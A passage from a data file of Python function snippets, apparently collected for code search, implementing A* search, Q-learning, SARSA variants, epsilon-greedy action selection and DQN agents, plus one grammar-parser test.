capaz seguir la implementacion del libro y hacer una funcion con el nodo como parametro y calcula la solucion,\n o hacer que frontier solo tenga los estados?\n frontier.update(succNode, succNode.path_cost) con esta operacion deberia de bastar\n \"\"\"\n break\n\n if not (StateInFrontierSet and not ExistsBetterPriority): # El caso en que no se hace nada es cuando ya esta en la frontera\n # pero con una mejor o igual prioridad\n frontier.push(succNode, succNode.f)\n #print 'Push ',repr((succNode.state, succNode.f))\n frontierSet.add((succNode.state, succNode.f))", "def select_action(self, state):\r\n policy_s = self.epsilon_greedy_probs(self.nA, self.Q[state], self.count, self.epsilon)\r\n return np.random.choice(np.arange(self.nA), p=policy_s)", "def step(self, state, action, reward, next_state, done):\r\n self.count = self.count + 1\r\n \r\n if done:\r\n self.Q[state][action] = self.update_Q(self.Q[state][action], 0, reward, self.alpha, self.gamma)\r\n self.count = 1\r\n return\r\n\r\n next_action = self.select_action(next_state)\r\n #self.Q[state][action] = self.update_Q(self.Q[state][action], self.Q[next_state][next_action], \r\n # reward, self.alpha, self.gamma)\r\n policy_s = self.epsilon_greedy_probs(self.nA, self.Q[next_state], self.count, self.epsilon)\r\n self.Q[state][action] = self.update_Q(self.Q[state][action], np.dot(self.Q[next_state], policy_s), \r\n reward, self.alpha, self.gamma)", "def q_learning(env, learning, discount, epsilon, min_eps, episodes):\n # [18.00000072 14.00000006]\n num_states = (env.observation_space.high - env.observation_space.low) * \\\n np.array([10, 100]) # >> [18.00000072 14.00000006]\n num_states = np.round(num_states, 0).astype(int) + 1 # >> [19 15]\n\n # Initialize Q table\n # env.action_space.n return the number of action that our agent can make (here 3, left, cease, right)\n Q = np.random.uniform(low=-1, high=1, size=(num_states[0], num_states[1], env.action_space.n))\n\n # Initialize variable to track rewards\n reward_list = []\n ave_reward_list = []\n\n # Calculate episodic reduction in epsilon\n reduction = (epsilon - min_eps) / (episodes / 2)\n\n for i in range(episodes):\n # Initialize parameters\n done = False\n tot_reward, reward = 0, 0\n state = env.reset()\n\n # Discretize state\n state_adj = adjust_state(state)\n\n while done != True:\n # Render env for last five eps\n if i >= (episodes - 20):\n env.render()\n\n # Determine next action - epsilon greedy strategy\n if np.random.random() < 1 - epsilon:\n action = np.argmax(Q[state_adj[0], state_adj[1]])\n else:\n action = np.random.randint(0, env.action_space.n)\n\n # Get next state and reward\n state2, reward, done, info = env.step(action)\n\n # Discretize state2\n state2_adj = adjust_state(state2)\n\n # Allow for terminal states // .5 on env_space[0] represent the flag position\n if done and state2[0] >= .5:\n Q[state_adj[0], state_adj[1], action] = reward\n\n # adjust Q value for current state\n else:\n '''work on this, it's complicated but far from non-understandable'''\n delta = learning*(reward + discount*np.max(Q[state2_adj[0], state2_adj[1]]) -\n Q[state_adj[0], state_adj[1], action])\n Q[state_adj[0], state_adj[1], action] += delta\n\n tot_reward += reward\n state_adj = state2_adj\n\n # Decay epsilon\n if epsilon > min_eps:\n epsilon -= reduction\n\n # Track rewards\n reward_list.append(tot_reward)\n\n if (i+1) % 100 == 0:\n ave_reward = np.mean(reward_list)\n ave_reward_list.append(ave_reward)\n reward_list = []\n print(f'Episode {i+1} Average Reward: {ave_reward}')\n\n env.close()\n\n return ave_reward_list", "def choose_action( self):\n \"\"\"greedy, random, e-greedy, boltzmann, bayesian\"\"\"\n\tif self.exploration == \"greedy\":\n #Choose an action with the maximum expected value.\n a,allQ = sess.run([q_net.predict,q_net.Q_out],feed_dict={q_net.inputs:[s],q_net.keep_per:1.0})\n a = a[0]\n return a\n if self.exploration == \"random\":\n #Choose an action randomly.\n a = env.action_space.sample()\n if self.exploration == \"e-greedy\":\n #Choose an action by greedily (with e chance of random action) from the Q-network\n if np.random.rand(1) < e or total_steps < pre_train_steps:\n a = env.action_space.sample()\n else:\n a,allQ = sess.run([q_net.predict,q_net.Q_out],feed_dict={q_net.inputs:[s],q_net.keep_per:1.0})\n a = a[0]\n return a\n if self.exploration == \"boltzmann\":\n #Choose an action probabilistically, with weights relative to the Q-values.\n Q_d,allQ = sess.run([q_net.Q_dist,q_net.Q_out],feed_dict={q_net.inputs:[s],q_net.Temp:e,q_net.keep_per:1.0})\n a = np.random.choice(Q_d[0],p=Q_d[0])\n a = np.argmax(Q_d[0] == a)\n return a\n if self.exploration == \"bayesian\":\n #Choose an action using a sample from a dropout approximation of a bayesian q-network.\n a,allQ = sess.run([q_net.predict,q_net.Q_out],feed_dict={q_net.inputs:[s],q_net.keep_per:(1-e)+0.1})\n a = a[0]\n return a", "def select_action(self, state):\n # print(\"agent.select_action() - state: {}\".format(state))\n\n self.step_counter += 1\n # self.epsilon = max(0.1, 1.0-self.step_counter/self.epsilon_decay_steps)\n epsilon_min = .01\n epsilon_max = .8\n epsilon_step = epsilon_max - (epsilon_max - epsilon_min) * self.step_counter / self.epsilon_decay_steps\n self.epsilon = max(epsilon_min, epsilon_step)\n # self.epsilon = max(0.1, 1.0/self.step_counter)\n\n rand = random.uniform(0, 1)\n if rand < self.epsilon:\n # choose random action\n return np.random.choice(self.nA)\n else:\n # choose greedy action\n return np.argmax(self.Q[state])", "def choose_action(env, Q, observation, epsilon):\n if np.random.uniform(0, 1) < epsilon:\n action = env.action_space.sample()\n else:\n action = np.argmax(Q[observation, :])\n return action", "def double_q_learning(env, gamma, n_episode, alpha):\n n_action = env.action_space.n\n n_state = env.observation_space.n\n Q1 = torch.zeros(n_state, n_action)\n Q2 = torch.zeros(n_state, n_action)\n for episode in tqdm(range(n_episode)):\n # for episode in range(n_episode):\n state = env.reset()\n is_done = False\n while not is_done:\n action = epsilon_greedy_policy(state, Q1 + Q2)\n next_state, reward, is_done, info = env.step(action)\n if (torch.rand(1).item() < 0.5):\n best_next_action = torch.argmax(Q1[next_state])\n td_delta = reward + gamma * Q2[next_state][best_next_action] - Q1[state][action]\n Q1[state][action] += alpha * td_delta\n else:\n best_next_action = torch.argmax(Q2[next_state])\n td_delta = reward + gamma * Q1[next_state][best_next_action] - Q2[state][action]\n Q2[state][action] += alpha * td_delta\n length_episode[episode] += 1\n total_reward_episode[episode] += reward\n if is_done:\n break\n state = next_state\n policy = {}\n Q = Q1 + Q2\n for state in range(n_state):\n policy[state] = torch.argmax(Q[state]).item()\n return Q, policy", "def act(self, state, epsilon):\n if random.random() > epsilon:\n state = torch.FloatTensor(state)\n q_values = self.dqn(state)\n action = q_values.argmax().item()\n else:\n action = self.env.action_space.sample()\n return action", "def act(self, state, eps=0.):\n state = torch.from_numpy(state).float().unsqueeze(0).to(device)\n self.qnetwork_local.eval()\n with torch.no_grad():\n action_values = self.qnetwork_local(state)\n self.qnetwork_local.train()\n\n # Epsilon-greedy action selection\n if random.random() > eps:\n return np.argmax(action_values.cpu().data.numpy())\n else:\n return random.choice(np.arange(self.action_size))", "def act(self, state, eps=0.):\n state = torch.from_numpy(state).float().unsqueeze(0).to(device)\n self.qnetwork_local.eval()\n with torch.no_grad():\n action_values = self.qnetwork_local(state)\n self.qnetwork_local.train()\n\n # Epsilon-greedy action selection\n if random.random() > eps:\n return np.argmax(action_values.cpu().data.numpy())\n else:\n return random.choice(np.arange(self.action_size))", "def choose_action(self, state):\n if random.random() < self.epsilon:\n self.epsilon -= self.epsilon_annealing_rate\n return random.choice(self.valid_actions)\n \n #initialize search variables\n opt_action = self.valid_actions[0]\n opt_value = 0\n\n #performs a search across all valid actions for highest q-value.\n for action in self.valid_actions:\n cur_value = self.q_value(state, action)\n if cur_value > opt_value:\n opt_action = action\n opt_value = cur_value\n elif cur_value == opt_value:\n opt_action = random.choice([opt_action, action])\n return opt_action", "def get_action_choice(self, state: str, epsilon: float):\n\n # e-greedy\n if random.random() < epsilon:\n return {0: random.choice(Actions.actions), 1: random.choice(Actions.actions)}\n else:\n # Get the Q-values for the actions in this state\n Qs_t = self.Q_t[state]\n\n max_Qs_t = max(Qs_t.values())\n\n # find index of the max Q-values\n max_index = [a for a, q in Qs_t.items()\n if q == max_Qs_t]\n\n # choose one of the max-index with uniform distribution\n selected = random.choice(max_index)\n return {0: selected[0], 1: selected[1]}", "def a_star(initial_state, heuristic, dimension=3):\n\n\tdef add_cost(node):\n\t\tnode.cost = node.depth + heuristic(node.state)\n\n\treturn search(initial_state, Frontier(PriorityQueue), dimension, cost_fn=add_cost)", "def astar_multi(maze):\n # TODO: Write your code here\n gFunction = {}\n frontier = PriorityQueue()\n path = []\n ret = []\n MSTLengths = {}\n edges = {}\n\n objectives = maze.getObjectives()\n start = State(maze.getStart()[0], maze.getStart()[1], objectives)\n gFunction[start] = 0\n frontier.put(start) \n getEdgeWeights(maze, objectives, edges) # init edge weights for MST\n\n while not frontier.empty():\n\n currentState = frontier.get()\n currentCell = currentState.cell()\n objectivesLeft = currentState.objectives()\n\n if objectivesLeft.count(currentCell) != 0:\n objectivesLeft.remove(currentCell)\n\n # all objectives found, initialise backtrace and exit loop\n if len(objectivesLeft) == 0:\n path.clear()\n ret.clear()\n path.append(currentState)\n ret.append(currentCell)\n break\n \n # if we have already calculated MST length we can reuse value\n # else calculate MST length for this state and store it.\n length = 0\n if str(objectivesLeft) in MSTLengths:\n length = MSTLengths[str(objectivesLeft)]\n else:\n length = getMSTLength(objectivesLeft.copy(), maze, edges)\n MSTLengths[str(objectivesLeft)] = length\n\n neighbors = maze.getNeighbors(currentCell[0], currentCell[1])\n\n for i in neighbors:\n\n neighbor = State(i[0], i[1], objectivesLeft)\n gVal= gFunction[currentState] + 1\n\n if neighbor not in gFunction or gVal < gFunction[neighbor]:\n\n neighbor.setParent(currentState)\n gFunction[neighbor] = gVal\n\n hFunction = []\n for j in objectivesLeft:\n hFunction.append(abs(j[0] - i[0]) + abs(j[1] - i[1]) + length) # use MST length + manhatten distance to nearest objective as heuristic.\n\n hVal = min(hFunction)\n\n neighbor.setfFunction(gFunction[neighbor] + hVal)\n frontier.put(neighbor)\n\n # backtrace\n while path[0]!= start:\n \n currentCell = path[0]\n path.insert(0, currentCell.parent())\n ret.insert(0, currentCell.parent().cell())\n\n return ret", "def step(self, state, action, reward, next_state, done):\n # print(\"agent.step() - state: {}, action: {}, reward: {}, next_state: {}, done: {}\".format(state, action, reward, next_state, done))\n current_reward_val = self.Q[state][action]\n next_step_greedy_action = np.argmax(self.Q[next_state])\n next_step_reward_val = self.Q[next_state][next_step_greedy_action]\n gamma = 0.75 # toto - paramterize\n self.Q[state][action] = self.Q[state][action] + self.alpha * (\n reward + gamma * next_step_reward_val - self.Q[state][action])", "def update_Q_expsarsa(alpha, gamma, nA, eps, Q, state, action, reward, next_state=None):\n current = Q[state][action] # estimate in Q-table (for current state, action pair)\n policy_s = np.ones(nA) * eps / nA # current policy (for next state S')\n policy_s[np.argmax(Q[next_state])] = 1 - eps + (eps / nA) # greedy action\n Qsa_next = np.dot(Q[next_state], policy_s) # get value of state at next time step\n target = reward + (gamma * Qsa_next) # construct target\n new_value = current + (alpha * (target - current)) # get updated value \n return new_value", "def make_q_update(self, reward, state: str, joint_action: Dict[int, str], next_state, alpha: float, gamma: float):\n previous_value = self.Q_t[state][(joint_action[0], joint_action[1])]\n if '(0, 0)' in next_state:\n max_future_reward = 0\n else:\n max_future_reward = max(self.Q_t[next_state].values())\n new_value = reward + gamma * max_future_reward\n\n self.Q_t[state][(joint_action[0], joint_action[1])] = (1 - alpha) * previous_value + alpha * new_value", "def test_greedy_zero_or_more():\n grammar = r\"\"\"\n S: A* A*;\n terminals\n A: \"a\";\n \"\"\"\n\n g = Grammar.from_string(grammar)\n p = GLRParser(g)\n forest = p.parse(\"a a a a a a\")\n assert len(forest) == 7\n\n # But greedy variant has only one solution where first A*! collects all tokens.\n grammar = r\"\"\"\n S: A*! A*;\n terminals\n A: \"a\";\n \"\"\"\n\n g = Grammar.from_string(grammar)\n p = GLRParser(g)\n forest = p.parse(\"a a a a a a\")\n assert len(forest) == 1", "def grid_search_epsilon(environmnet, policy='ε–greedy', parameter='epsilon'):\n\tparameter_values = []\n\tavg_scores = []\n\tavg_steps = []\n\n\tcount = 1\n\tdecay_search = [0.5, 0.6, 0.7, 0.8, 0.9, 0.99, 0.99]\n\tfor param_num in decay_search:\n\n\t\tagent = Q_Agent(exploration_rate_decay=param_num, epsilon=1)\n\t\tall_iterations, all_rewards, step_count = agent.train(environmnet, print_results=True, iter_n=1000,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t policy=policy)\n\t\tavg_scores.append(np.mean(all_rewards))\n\t\tavg_steps.append(np.mean(step_count))\n\t\tparameter_values.append(param_num)\n\t\trewards_data = np.array([all_iterations, all_rewards])\n\t\tstep_data = np.array([all_iterations, step_count])\n\n\t\tnp.savetxt(\n\t\t\t'/Users/matthewgalloway/Documents/RF/q_learning/' + parameter + '_inv/' + parameter + '_rewards_' + str(\n\t\t\t\tparam_num) + '.csv', rewards_data.transpose(), delimiter=\",\")\n\t\tnp.savetxt(\n\t\t\t'/Users/matthewgalloway/Documents/RF/q_learning/' + parameter + '_inv/' + parameter + '_steps_' + str(\n\t\t\t\tparam_num) + '.csv', step_data.transpose(), delimiter=\",\")\n\t\tif count % 50 == 0:\n\t\t\tprint('iteration {} of 10'.format(count))\n\n\t\tcount += 1\n\tresults = {\n\t\t'param_values': parameter_values,\n\t\t'avg_scores': avg_scores,\n\t\t'avg_steps': avg_steps,\n\n\t}\n\tprint(results)\n\treturn pd.DataFrame(results)", "def act(self, state, epsilon=None):\r\n if epsilon is None: epsilon = self.epsilon\r\n q_values = self.value(state)\r\n q_values = q_values.squeeze(1)\r\n if random.random() < epsilon:\r\n aciton = random.randrange(self.action_space.n)\r\n else:\r\n aciton = q_values.argmax(1)[0]\r\n return aciton", "def agentTraining(noOfDecks,\r\n sampleSpaceSearching,\r\n sampleSpaceExploitation,\r\n method,\r\n gamma,\r\n qTable=None):\r\n deckSize = noOfDecks*52\r\n optimalScore = 0 # winning score and losing Score\r\n egreedyScore = 0\r\n pO = [0,0,0]\r\n pe = [0,0,0]\r\n\r\n gamePlay = Dealing(noOfDecks)\r\n gamePlay.newRound()\r\n \r\n agent = adp(deckSize,\r\n gamePlay.deck,\r\n gamePlay.hitScore,\r\n gamePlay.partialDealerScore,\r\n gamePlay.dealerScore,\r\n gamePlay.aceCount,\r\n gamePlay.aceCriticalHit,\r\n gamma)\r\n \r\n # for iterating \r\n if qTable !=None:\r\n if type(qTable) == int:\r\n agent.QList = []\r\n else: \r\n for trajectory in range(len(qTable)):\r\n agent.QList.append(qTable[trajectory])\r\n # for qtable, expect form: [[(trajector1)], [(initialSize,remainingAmount,agentScore,dealerScore',\r\n # NoOfAces,twoAcesOrMore,reward,decision),...]]\r\n \r\n for trajectoryNumber in range(sampleSpaceSearching + sampleSpaceExploitation):\r\n exploredStateAction = []\r\n while gamePlay.ifGameEnd() == False: \r\n \r\n if trajectoryNumber < sampleSpaceSearching: # condition for still exploring \r\n \r\n e = 100 / (100+len(exploredStateAction)) # as explore more, more likely to\r\n # stick to optimal policy\r\n action = agent.eGreedyPolicyQTable(e, \r\n deckSize,\r\n gamePlay.remainingDeckSize,\r\n gamePlay.hitScore, # true cards\r\n gamePlay.partialDealerScore, # visible to agent\r\n gamePlay.dealerScore, # true cards\r\n gamePlay.aceCount,#8\r\n gamePlay.aceCriticalHit)#8\r\n else: # if in exploitation phase \r\n action = agent.optimalPolicyQTable(deckSize,\r\n gamePlay.remainingDeckSize,\r\n gamePlay.hitScore,\r\n gamePlay.partialDealerScore,#8\r\n gamePlay.dealerScore,\r\n gamePlay.aceCount,#8\r\n gamePlay.aceCriticalHit)#8\r\n\r\n numRemaining = gamePlay.remainingDeckSize\r\n agentScore = gamePlay.hitScore\r\n agentVisScore = gamePlay.partialDealerScore\r\n actualDealerScore = gamePlay.dealerScore\r\n numOfaces = gamePlay.aceCount\r\n criticalAce = gamePlay.aceCriticalHit # boolean \r\n reward = gamePlay.actionOutcome(action)\r\n # if gamePlay.actionOutcome(action) method executed, newround or hit method is \r\n # also exectued. this inturn updates gameplay details. Hence assigned \r\n # variables prior to method excecution\r\n stateAction = (deckSize, numRemaining,\r\n agentScore,agentVisScore,\r\n actualDealerScore, numOfaces,\r\n criticalAce, reward,\r\n action)\r\n\r\n if stateAction not in agent.QList and (agentScore >= actualDealerScore\r\n and agentScore <= gamePlay.blackJack):\r\n # if not a repeated state-action anywhere in my searchedSpace, save it\r\n exploredStateAction.append(stateAction)\r\n \r\n if gamePlay.ifGameEnd() == True:\r\n agent.QList.append(exploredStateAction)\r\n agent.QTableUpdate(method,\r\n reward,\r\n gamma)\r\n break\r\n\r\n if trajectoryNumber > sampleSpaceSearching: # optimal policy \r\n if reward > 0: \r\n optimalScore += gamePlay.hitScore**2\r\n pO[0] +=1 # winning points\r\n if reward ==0:\r\n pO[1] +=1 \r\n if reward < 0:\r\n pO[2] += 1\r\n \r\n else: # eGreedy policy \r\n if reward > 0: \r\n egreedyScore += gamePlay.hitScore**2\r\n pe[0] +=1 # winning points\r\n if reward ==0:\r\n pe[1] +=1\r\n if reward < 0:\r\n pe[2] +=1\r\n \r\n print(\"Deck size = {} deck(s) using policy\"\r\n \" search method: {}\".format(gamePlay.deckSize,\r\n method)) \r\n \r\n print(\"The agent exploration period = {} rounds.Followed by {}\"\r\n \" rounds of exploitation\".format(sampleSpaceSearching,sampleSpaceExploitation))\r\n\r\n print(\"The Agent average quadratic score per game exploration phase = {}\"\r\n \" The exploitation quadratic score per game = {}\"\r\n \" In terms of winning and loosing against the house,\"\r\n \" the Agent wins {}% draws {}% and loses {}% on the training (explore) stage, followed by \"\r\n \" wins {}% draws {}% and loses {}% on the\"\r\n \" testing (exploitation) stage \".format((egreedyScore/sampleSpaceSearching),\r\n (optimalScore/sampleSpaceExploitation),\r\n np.round(pe[0]/sum(pe)*100,1 ),\r\n np.round(pe[1]/sum(pe)*100,1 ),\r\n np.round(pe[2]/sum(pe)*100,1 ),\r\n np.round(pO[0]/sum(pO)*100,1 ),\r\n np.round(pO[1]/sum(pO)*100,1 ),\r\n np.round(pO[2]/sum(pO)*100,1 ))) \r\n\r\n return agent.QList, pe, pO, egreedyScore, optimalScore", "def step(self, state, action, reward, next_state, done):\n self.i_episode += 1\n Q = self.Q\n \n self.currentPolicy_s = self.epsilon_greedy_probs(self.Q[next_state], self.i_episode, 0.005)\n newQ = self.update_Q(Q[state][action], \\\n np.dot(Q[next_state], self.currentPolicy_s), \\\n reward, \\\n self.getAlpha(), \\\n self.getGamma())\n self.Q[state][action] = newQ", "def chooseAction(self, epsilon, state):\n if random.uniform(0, 1) < epsilon:\n return random.randrange(9)\n\n cur_best_val = -float('inf')\n cur_best_action = 0\n\n data = env.getAllNextStates(state)\n\n with torch.no_grad():\n for action, next_state, done in data:\n if next_state != state:\n value = self.NN(self.RBF[next_state]).item() if not done else 0\n if value > cur_best_val:\n cur_best_val = value\n cur_best_action = action\n #print(data)\n return cur_best_action", "def get_greedy_actions(self, state):\n state_action_values = self.get_action_values(state) # What are the value that we could get from current state\n\n max_action_value = max(state_action_values) # What is the higher value\n max_value_indices = [i for i, value in enumerate(state_action_values) if\n value == max_action_value] # Gets their indices\n\n # Prepares action probabilites for the ones with the higher value\n action_probs = np.zeros((4,))\n action_probs[max_value_indices] = 1 / (len(max_value_indices) if type(max_value_indices) is list else 1)\n\n return action_probs", "def astar(G,s,g,cost=(lambda v,w:1),heuristic=(lambda v:0),verbose=1):\n if not callable(g):\n gtest = lambda x,goal=g: x==g\n else:\n gtest = g\n d = dict((v,float('inf')) for v in G.nodes())\n p = dict((v,None) for v in G.nodes())\n d[s] = 0\n Q = [(0,0,s)] #each element is a tuple (f,-c,v) with f=c + heuristic(v), c=cost from start, v=vertex\n nnodes = 0\n while len(Q) > 0:\n f,minus_c,v = heapq.heappop(Q) #get the element in the queue with the least value of c\n nnodes += 1\n if gtest(v):\n #found a path\n if verbose: print(\"A* succeeded in\",nnodes,\"iterations\")\n return predecessor_traverse(p,s,v),d,p\n for w in G.neighbors(v):\n dcand = d[v] + cost(v,w) #this is the cost of going through v to w\n if dcand < d[w]:\n #going through v is optimal\n #if the predecessor of w is not None, then we'll have to adjust the heap\n if p[w] is not None:\n Q = [(f,c,x) for (f,c,x) in Q if x is not w]\n heapq.heapify(Q)\n d[w] = dcand\n p[w] = v\n #put w back on the queue, with the heuristic value as its priority\n heapq.heappush(Q,(dcand+heuristic(w),-dcand,w))\n #no path found\n if verbose: print(\"A* failed in\",nnodes,\"iterations\")\n return None,d,p", "def predict_plan(self, time_step: TimeStep, state: PlannerState,\n epsilon_greedy):\n pass", "def get_next_action(self, epsilon, learning_params):\n\n T = learning_params.T\n\n if random.random() < epsilon:\n # With probability epsilon, randomly select an action for each agent.\n a_selected = np.full(self.num_agents, -1, dtype=int)\n for i in range(self.num_agents):\n a_selected[i] = random.choice(self.actions[i])\n else:\n partial_index = [] # Don't include action indexes. As a result, in pr_sum, we are summing over actions.\n for i in range(self.num_agents):\n partial_index.append(self.s[i])\n partial_index.append(self.u)\n partial_index = tuple(partial_index)\n\n # Sum over all possible actions for fixed team state and reward machine state.\n pr_sum = np.sum(np.exp(self.q[partial_index] * T))\n\n # pr[i] is an array representing the probability values that agent i will take various actions.\n pr = np.exp(self.q[partial_index] * T)/pr_sum\n\n shp = pr.shape\n pr = pr.flatten()\n\n pr_select = np.zeros([len(pr) + 1, 1])\n pr_select[0] = 0\n for i in range(len(pr)):\n pr_select[i+1] = pr_select[i] + pr[i]\n\n randn = random.random()\n for i in range(len(pr)):\n if randn >= pr_select[i] and randn <= pr_select[i+1]:\n a_selected = np.unravel_index(i, shp)\n a_selected = np.array(a_selected, dtype=int)\n break\n\n a = a_selected\n\n return self.s, a", "def take_action(self, state):\n if self.epsilon_decay is not None:\n self.epsilon *= self.epsilon_decay\n if random.random() < self.epsilon:\n action = super(BaseQAgent, self).random_next_action(state)\n self.log('exploration move: {0}'.format(str(action)))\n else:\n action = self.greedy_next_action(state)\n self.log('exploitation move: {0}'.format(str(action)))\n return action", "def update_Q(self, state, action, reward, new_state = None):\n Q_val = self.Q[state][action]\n \n # Look at the best action from the next state.\n Qp_val = 0\n if new_state is not None:\n Qp_val = max(self.Q[new_state].values())\n \n # The famous formula:\n Q_val = Q_val + self.alpha * (reward + self.gamma * Qp_val - Q_val)\n #print self.alpha\n #print state, 'action: ', action\n #print 'Q[%s]: %s' % (state, self.Q[state])\n #print 'Q val: ', Q_val\n \n self.Q[state][action] = Q_val\n \n return None", "def choose_action(s, epsilon):\n # Update PI(s, a) for all actions a for that state s:\n # action probabilities = epsilon/(|A|-1) for all actions by default\n # over |A|-1 because 1 of them will be optimal and have proba 1-epsilon\n global PI\n PI[s, :] = [epsilon / (len(ACTIONS)-1.)] * len(ACTIONS)\n\n # Get the best action for that state (greedy w.r.t. Q):\n best_a = 0\n best_q_val = -np.inf\n for i, q_val in enumerate(Q[s,:]):\n if q_val > best_q_val:\n best_q_val = q_val\n best_a = i\n\n # Change default proba of best action to be 1-epsilon\n PI[s, best_a] = 1. - epsilon\n # print \"best action:\", best_a\n assert np.isclose(np.sum(PI[s, :]), 1.)\n\n # sample from ACTIONS with proba distribution PI[s, :]\n return np.random.choice(ACTIONS, p=PI[s, :])", "def sample(self, observation):\n if not isinstance(observation, self.state_space):\n raise KeyError\n if random.random() < self.epsilon(observation):\n actions = self.valid_actions()\n return actions[random.randint(0, len(actions) - 1)]\n else:\n return super(EpsilonGreedy, self).sample(observation)", "def astar(maze):\n # TODO: Write your code here\n gFunction = {}\n frontier = PriorityQueue()\n path = []\n ret = []\n objectives = maze.getObjectives()\n start = State(maze.getStart()[0], maze.getStart()[1], objectives[0])\n gFunction[start] = 0\n frontier.put(start)\n\n while not frontier.empty():\n\n currentState = frontier.get()\n currentCell = currentState.cell()\n\n # objective found, initialise backtrace and exit search\n if maze.isObjective(currentCell[0], currentCell[1]):\n\n path.append(currentState)\n ret.append(currentCell)\n break\n\n neighbors = maze.getNeighbors(currentCell[0], currentCell[1])\n\n for i in neighbors:\n\n neighbor = State(i[0], i[1], objectives[0])\n gVal= gFunction[currentState]+1\n\n # if neighbor is not visited or if we found better path to it, add it to the frontier\n if neighbor not in gFunction or gVal < gFunction[neighbor]:\n neighbor.setParent(currentState)\n gFunction[neighbor] = gVal\n hFunction = abs(objectives[0][0] - i[0]) + abs(objectives[0][1] - i[1]) # use manhatten distance as heuristic\n neighbor.setfFunction(gFunction[neighbor] + hFunction)\n frontier.put(neighbor)\n\n # backtrace\n while path[0]!= start:\n \n currentCell = path[0]\n path.insert(0, currentCell.parent())\n ret.insert(0, currentCell.parent().cell())\n\n return ret", "def heuristic_fn(x, clf, manifest_set, epsilon, q_norm=np.inf):\r\n # Debug.\r\n counter = Counter.get_default()\r\n count = counter.count()\r\n if count % DEBUG_FREQ == 0:\r\n logger.debug(\">> (heuristic_fn start) Node counter is: {}.\".format(count))\r\n\r\n score = clf.decision_function([x])[0]\r\n if score <= 0:\r\n return 0.0\r\n h = np.abs(score) / np.linalg.norm(clf.coef_[0, list(manifest_set)], ord=q_norm)\r\n\r\n return h * epsilon", "def a_star_search(problem, heuristic=null_heuristic):\r\n \"*** YOUR CODE HERE ***\"\r\n fringe = util.PriorityQueue()\r\n path = set()\r\n final = []\r\n acts = dict()\r\n state = problem.get_start_state()\r\n fringe.push(state, 0)\r\n\r\n while (True):\r\n state = fringe.pop()\r\n path.add(state)\r\n states = problem.get_successors(state)\r\n acts[state] = states[:]\r\n if problem.is_goal_state(state):\r\n break\r\n\r\n states = problem.get_successors(state)\r\n # push into fringe\r\n for stat in states:\r\n if stat[0] not in path:\r\n \"\"\"\r\n it does worse in corners problems, to work better needs heavy huristic, not worth in\r\n in corners problem expandend nodes grow expo\r\n all others are better\r\n counter = 0 # in some situation it helps, in some it doesnt\r\n #print(stat[0].pieces)\r\n for x in stat[0].pieces[0]:\r\n if x:\r\n counter += 1\r\n \"\"\"\r\n counter = 0\r\n fringe.push(stat[0], stat[2] + counter + heuristic(stat[0], problem)) # problem.get_cost_of_actions([stat[1]])\r\n\r\n while (True):\r\n\r\n for key, val in acts.items():\r\n for va in val:\r\n if va[0] == state:\r\n final.append(va[1])\r\n state = key\r\n break\r\n else:\r\n continue\r\n break\r\n if state == problem.get_start_state():\r\n break\r\n\r\n final.reverse()\r\n\r\n return final", "def astar(grid, heuristic):\r\n\r\n print (grid.getStart())\r\n frontier = PriorityQueue()\r\n frontierCpy = {}\r\n\r\n goal = grid.getGoals()[0]\r\n\r\n startX = grid.getStart()[0]\r\n startY = grid.getStart()[1]\r\n startNode = Node(((startX, startY), 0), None)\r\n\r\n init_heu = heuristic(startNode.cell[0], goal)\r\n frontierCpy[startNode.cell[0]] = init_heu\r\n frontier.put((init_heu, 0, startNode))\r\n\r\n while frontier.qsize() != 0:\r\n tup = frontier.get()\r\n\r\n currNode = tup[2]\r\n currG = tup[1] * -1\r\n grid.addVisited(currNode.cell[0])\r\n frontierCpy.pop(currNode.cell[0], None)\r\n\r\n if currNode.cell[0] == goal:\r\n path = []\r\n while currNode != None:\r\n path.insert(0, currNode.cell[0])\r\n currNode = currNode.parent\r\n grid.setPath(path)\r\n return path\r\n\r\n\r\n neighbors = grid.getNeighbors(currNode.cell[0])\r\n\r\n for n in neighbors:\r\n if n[0] not in grid.getVisited():\r\n newNode = Node(n, currNode)\r\n\r\n h = heuristic(n[0], goal)\r\n\r\n oneStepCost = n[1]\r\n g = oneStepCost + currG\r\n if n[0] not in frontierCpy or frontierCpy[n[0]] > h + g:\r\n frontier.put((h+g, -1*g, newNode))\r\n frontierCpy[n[0]] = h+g\r\n print(\"CANT FIND A PATH\")", "def step(self, new_state, reward=None, done=None, mode='train'):\n\n if mode == 'test':\n # Test mode: take greedy action\n action = np.argmax(self.q_table[new_state])\n return action\n \n else:\n # Train mode: take a step and return action\n \n # QL step update \n if self.learning == \"q_learning\":\n self.q_table[self.last_state, self.last_action] += self.alpha * \\\n (reward + self.gamma * max(self.q_table[new_state]) - self.q_table[self.last_state, self.last_action])\n new_action = action_egreedy(self.q_table[self.last_state], self.epsilon, self.action_size)\n \n # SARSA step update \n elif self.learning == \"sarsa\":\n new_action = action_egreedy(self.q_table[new_state], self.epsilon, self.action_size)\n self.q_table[self.last_state, self.last_action] += self.alpha * \\\n (reward + self.gamma * self.q_table[new_state, new_action] - self.q_table[self.last_state, self.last_action])\n \n # Expected SARSA step update \n elif self.learning == \"expected_sarsa\":\n self.q_table[self.last_state, self.last_action] += self.alpha * \\\n (reward + self.gamma * np.mean(self.q_table[new_state]) - self.q_table[self.last_state, self.last_action])\n new_action = action_egreedy(self.q_table[new_state], self.epsilon, self.action_size)\n \n # Double Sarsa step update \n elif self.learning == \"double_sarsa\":\n new_action = action_egreedy(np.mean([self.q_table_1[new_state],self.q_table_2[new_state]], axis=0), self.epsilon, self.action_size)\n if random.random() < 0.5:\n self.q_table_1[self.last_state, self.last_action] += self.alpha * (reward + self.gamma * self.q_table_1[new_state, new_action] - self.q_table_1[self.last_state, self.last_action])\n else:\n self.q_table_2[self.last_state, self.last_action] += self.alpha * (reward + self.gamma * self.q_table_2[new_state, new_action] - self.q_table_2[self.last_state, self.last_action])\n \n # Double Expected Sarsa step update \n elif self.learning == \"double_expected_sarsa\":\n if random.random() < 0.5:\n self.q_table_1[self.last_state, self.last_action] += self.alpha * (reward + self.gamma * np.mean(self.q_table_2[new_state]) - self.q_table_1[self.last_state, self.last_action])\n else:\n self.q_table_2[self.last_state, self.last_action] += self.alpha * (reward + self.gamma * np.mean(self.q_table_1[new_state]) - self.q_table_2[self.last_state, self.last_action])\n new_action = action_egreedy(np.mean([self.q_table_1[new_state],self.q_table_2[new_state]], axis=0), self.epsilon, self.action_size)\n \n # Double QL step update \n elif self.learning == \"double_q_learning\":\n if random.random() < 0.5:\n self.q_table_1[self.last_state, 